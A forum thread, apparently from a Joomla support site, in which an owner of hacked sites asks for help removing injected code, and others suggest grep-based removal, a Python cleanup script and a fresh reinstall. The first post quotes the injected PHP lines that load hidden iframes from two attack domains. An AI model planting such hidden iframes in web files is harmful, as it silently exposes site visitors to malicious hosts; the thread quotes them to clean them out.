Viewing 15 posts - 1 through 15 (of 19 total)
    GeoVi Friend
    #141037

    Hello,

    I’m really bothered by having to search each module, component and administration files default.php for the following bug:

    echo “<iframe src=”http://vafuiek.com/?click=81F01A” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>”;

    echo “<iframe src=”http://clifedo.net/?click=51891D” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>”;

    It seems to be everywhere. Is there an easy fix? It’s in my backups, too, no doubt. Do I crash the sites and start over building them? I’m using J1.5.10 on both sites that were hacked. I’ve changed passwords in FTP and MySQL and admin site info but I’m still finding this rubbish the deeper I search. Is there another way?

    I’d appreciate your help very much. Thanks!

    Miffed and wornout,
    GeoVi –

    but still grateful, the sites are still up and running but I’m getting weird error messages, make a check and sure enough that rubbish is the culprit.

    PLEASE HELP!!:((

    Arvind Chauhan Moderator
    #304175

    Hi GeoVi,

    Sad that your site got hacked, the inserted site url in your pages is a confirmed attack site.

    Here is what you can try to remove the code from your pages :

    1. Download your complete site backup on your computer. Unzip into a folder.
    2. Download Windows Grep from here http://www.wingrep.com and install it.
    3. On the folder right click >>Windows Grep >> Put the complete length of above URL code (hacker inserted), select *.* in file types, click search and Finish.

    4. If your input is correct it will display the list of files containing the above code.
    5. Look at the top menu of windows grep >> use the second torch Icon (with text A>B). To replace the above code. Just leave the field empty and it will override the code with blank space.

    Hope that helps

    Regards

    arvind
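
An added example, not part of the original post: the same search-and-remove pass scripted in Python over an unzipped site backup, generalized from the two exact URLs to any one-line `echo` of an iframe styled `visibility:hidden`. The file-extension list, the `.infected` copy suffix and the sample file contents are assumptions constructed for this example.

```python
import re
import shutil
import tempfile
from pathlib import Path

SUFFIXES = {".php", ".html", ".htm"}  # file types to inspect (assumption)
# Heuristic: a one-line echo of an iframe with visibility:hidden, the shape
# quoted in the first post. Review the hits before cleaning anything.
INJECTED = re.compile(
    rb'[ \t]*echo\s+"<iframe\b[^\r\n]*?visibility:\s*hidden'
    rb'[^\r\n]*?</iframe>"\s*;[ \t]*\r?\n?',
    re.IGNORECASE,
)

def scan(root):
    """Return {relative path: number of injected statements} under root."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SUFFIXES:
            count = len(INJECTED.findall(path.read_bytes()))
            if count:
                hits[path.relative_to(root).as_posix()] = count
    return hits

def clean(root):
    """Strip the statements; keep each original as <name>.infected."""
    cleaned = scan(root)
    for rel in cleaned:
        path = Path(root) / rel
        shutil.copy2(path, path.with_name(path.name + ".infected"))
        path.write_bytes(INJECTED.sub(b"", path.read_bytes()))
    return cleaned

def demo():
    """Run scan/clean on a constructed sample tree (placeholder domain)."""
    bad = (b'<?php\n'
           b'echo "<iframe src=\\"http://injected.example.invalid/?click=0\\" '
           b'width=1 height=1 style=\\"visibility:hidden\\"></iframe>";\n'
           b'echo "hello";\n')
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "modules").mkdir()
        (Path(root) / "modules" / "default.php").write_bytes(bad)
        (Path(root) / "index.php").write_bytes(b'<?php echo "clean"; ?>\n')
        before = clean(root)
        after = scan(root)
        text = (Path(root) / "modules" / "default.php").read_bytes()
    return before, after, text

if __name__ == "__main__":
    print(demo())
```

Run `scan()` on its own first and read the listed files; `clean()` works on bytes, so line endings and encodings in the remaining code are left untouched.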

    nguyenhuu quang Friend
    #304189

    Hi, your site is not hacked.
    It is malware, I think from your PC. I have fixed a lot of sites with this malware or virus.
    All index.php, index.html, default.php
    add: your iframe and / or <javascript>hjfhsh fsdhfkj</javascript>
    Follow me:
    1. Clean your PC first.
    2. Download a fresh latest Joomla version.
    3. Download the latest of your 3rd-party extensions.
    4. On your host create a new dir, for example: Yoursite.com/new
    5. Upload and install the new Joomla with all extensions (same old version at root).
    6. Edit your configuration.php to your old database.
    7. Move all images (only image files, not index.html) from root to the new dir.
    That’s all

    GeoVi Friend
    #304254

    <em>@drarvindc 128040 wrote:</em><blockquote>Hi GeoVi,

    Sad that your site got hacked, the inserted site url in your pages is a confirmed attack site.

    Here is what you can try to remove the code from your pages :

    1. Download your complete site backup on your computer. Unzip into a folder.
    2. Download Windows Grep from here http://www.wingrep.com and install it.
    3. On the folder right click >>Windows Grep >> Put the complete length of above URL code (hacker inserted), select *.* in file types, click search and Finish.

    4. If your input is correct it will display the list of files containing the above code.
    5. Look at the top menu of windows grep >> use the second torch Icon (with text A>B). To replace the above code. Just leave the field empty and it will override the code with blank space.

    Hope that helps

    Regards

    arvind</blockquote>

    Hi arvind,

    Thank you very much for responding and showing you care. I will attempt this and pray that it works. I may come back to get verification of a step. I’m a novice at this.

    Kindest regards,
    GeoVi

    GeoVi Friend
    #304255

    <em>@quang268 128057 wrote:</em><blockquote>Hi, your site is not hacked.
    It is malware, I think from your PC. I have fixed a lot of sites with this malware or virus.
    All index.php, index.html, default.php
    add: your iframe and / or <javascript>hjfhsh fsdhfkj</javascript>
    Follow me:
    1. Clean your PC first.
    2. Download a fresh latest Joomla version.
    3. Download the latest of your 3rd-party extensions.
    4. On your host create a new dir, for example: Yoursite.com/new
    5. Upload and install the new Joomla with all extensions (same old version at root).
    6. Edit your configuration.php to your old database.
    7. Move all images (only image files, not index.html) from root to the new dir.
    That’s all</blockquote>

    Quang,

    Thanks again for replying to one of my threads. You said before it wasn’t a hack but malware. I believe I know the difference. I will try what arvind suggested in the first post – first. Then I’ll do what you’ve suggested. I hope something works.

    Kind regards,
    GeoVi

    PS I am not sure how to do step 6 and may have to ask at a later time. Also in step 5, when you say upload and install new Joomla with all extensions, am I uploading OVER the old version? Do I just “overwrite all” when asked?

    Now that I understand this, I may do this first..What I do not understand is Norton Antivirus doesn’t show a bug/virus.

    GeoVi Friend
    #304376

    <em>@drarvindc 128040 wrote:</em><blockquote>Hi GeoVi,

    Sad that your site got hacked, the inserted site url in your pages is a confirmed attack site.

    Here is what you can try to remove the code from your pages :

    1. Download your complete site backup on your computer. Unzip into a folder.
    2. Download Windows Grep from here http://www.wingrep.com and install it.
    3. On the folder right click >>Windows Grep >> Put the complete length of above URL code (hacker inserted), select *.* in file types, click search and Finish.

    4. If your input is correct it will display the list of files containing the above code.
    5. Look at the top menu of windows grep >> use the second torch Icon (with text A>B). To replace the above code. Just leave the field empty and it will override the code with blank space.

    Hope that helps

    Regards

    arvind</blockquote>

    Hi arvind,

    I downloaded/installed Windows Grep. It does not recognize this extension. I don’t know what to do. I do not understand Step 3. Can you provide more clarification, please?

    Thank you,
    GeoVi

    nguyenhuu quang Friend
    #304391

    I think my way is best. I have fixed a lot of sites with the same problem.

    GeoVi Friend
    #304392

    <em>@quang268 128311 wrote:</em><blockquote>I think my way is best. I have fixed a lot of sites with the same problem.</blockquote>

    Okay, I’ll try your way first.

    I’ve run Norton and it shows nothing. You said to clean my pc first. Since Norton shows nothing, am I to assume then my PC is clean and proceed? I have 3 sites that are infected! I am so annoyed by this.

    Thanks.

    GeoVi Friend
    #305687

    <em>@quang268 128057 wrote:</em><blockquote>Hi, your site is not hacked.
    It is malware, I think from your PC. I have fixed a lot of sites with this malware or virus.
    All index.php, index.html, default.php
    add: your iframe and / or <javascript>hjfhsh fsdhfkj</javascript>
    Follow me:
    1. Clean your PC first.
    2. Download a fresh latest Joomla version.
    3. Download the latest of your 3rd-party extensions.
    4. On your host create a new dir, for example: Yoursite.com/new
    5. Upload and install the new Joomla with all extensions (same old version at root).
    6. Edit your configuration.php to your old database.
    7. Move all images (only image files, not index.html) from root to the new dir.
    That’s all</blockquote>

    Quang,

    What a beautiful baby!!! *warm smile*

    I have been busy. I am forced to take care of site now because Google and Firefox say it is dangerous for site visitors with a bad message when going to it.

    I have done these things:
    1. 2. 3. 4. 5. 7.

    Now I am unsure about #6. I have questions, please. I do not know what I am doing but trying to understand so please be patient.

    1. Will I have to retype the content articles etc. to the new site or is there a way to transfer them to the new site.
    2. When you say edit configuration.php to my old database, what do you mean?
    3. Will I delete the infected site in the root and move the new site from the subdirectory to the new site when everything is done?

    Thank you for your help. I believe this is the best answer.

    Kindest regards,
    GeoVi

    nguyenhuu quang Friend
    #305688

    ok. if you move new site to root. so upload again configuration.php. no problem.
    because:
    example:

    var $tmp_path = 'C:\AppServ\www\Joomla_1.5.9\tmp';
    var $log_path = 'C:\AppServ\www\Joomla_1.5.9\logs';

    if you on new dir like that:
    var $tmp_path = 'C:\AppServ\www\Joomla_1.5.9\new\tmp';
    var $log_path = 'C:\AppServ\www\Joomla_1.5.9\new\logs';

    so when you move to root, need to edit it
    Thanks

    GeoVi Friend
    #305701

    <em>@quang268 129949 wrote:</em><blockquote>ok. if you move new site to root. so upload again configuration.php. no problem.
    because:
    example:

    var $tmp_path = 'C:\AppServ\www\Joomla_1.5.9\tmp';
    var $log_path = 'C:\AppServ\www\Joomla_1.5.9\logs';

    if you on new dir like that:
    var $tmp_path = 'C:\AppServ\www\Joomla_1.5.9\new\tmp';
    var $log_path = 'C:\AppServ\www\Joomla_1.5.9\new\logs';

    so when you move to root, need to edit it
    Thanks</blockquote>

    Thank you very much for quick reply but I do not fully understand.

    How do I move articles and content from old site to new site? Do I copy and paste them? Am I rebuilding the site? If I must, I will but if there is a way to avoid it, I would like to know, please.

    nguyenhuu quang Friend
    #305702

    open your configuration.php and you can see like that

    var $dbtype = 'mysql';
    var $host = 'localhost';
    var $user = 'root';
    var $password = 'thanhlam';
    var $db = 'joomla159';
    var $dbprefix = 'jos_';

    and change it to Old database
    or, if you still to keep old configuration.php.
    pls rename new configuration.php and upload old configuration.php to your host

    GeoVi Friend
    #305705

    <em>@quang268 129963 wrote:</em><blockquote>open your configuration.php and you can see like that

    var $dbtype = 'mysql';
    var $host = 'localhost';
    var $user = 'root';
    var $password = 'thanhlam';
    var $db = 'joomla159';
    var $dbprefix = 'jos_';

    and change it to Old database
    or, if you still to keep old configuration.php.
    pls rename new configuration.php and upload old configuration.php to your host</blockquote>

    I think I got it now! Thank you!! You have been very patient with me and I am forever grateful. *gracefully bowing*

    Big smile! 😀

    GeoVi

    nguyenhuu quang Friend
    #305706

    No problem GeoVi, sorry for my bad English, so sometimes not clear.
    Thanks
    Do you have Skype or YM or other chat software? Pls contact me.

    GeoVi Friend
    #305711

    <em>@quang268 129967 wrote:</em><blockquote>No problem GeoVi, sorry for my bad English, so sometimes not clear.
    Thanks
    Do you have Skype or YM or other chat software? Pls contact me.</blockquote>

    Quang, it is not your English. It is me not understanding how MySQL works and other tech issues. I just want to have a site that works but there is more involved. Your English is better than my Vietnamese. :laugh: You do very well with English.

    I am trying to reach you on Skype now. 🙂


This topic contains 19 replies, has 5 voices, and was last updated by  nguyenhuu quang 15 years, 5 months ago.
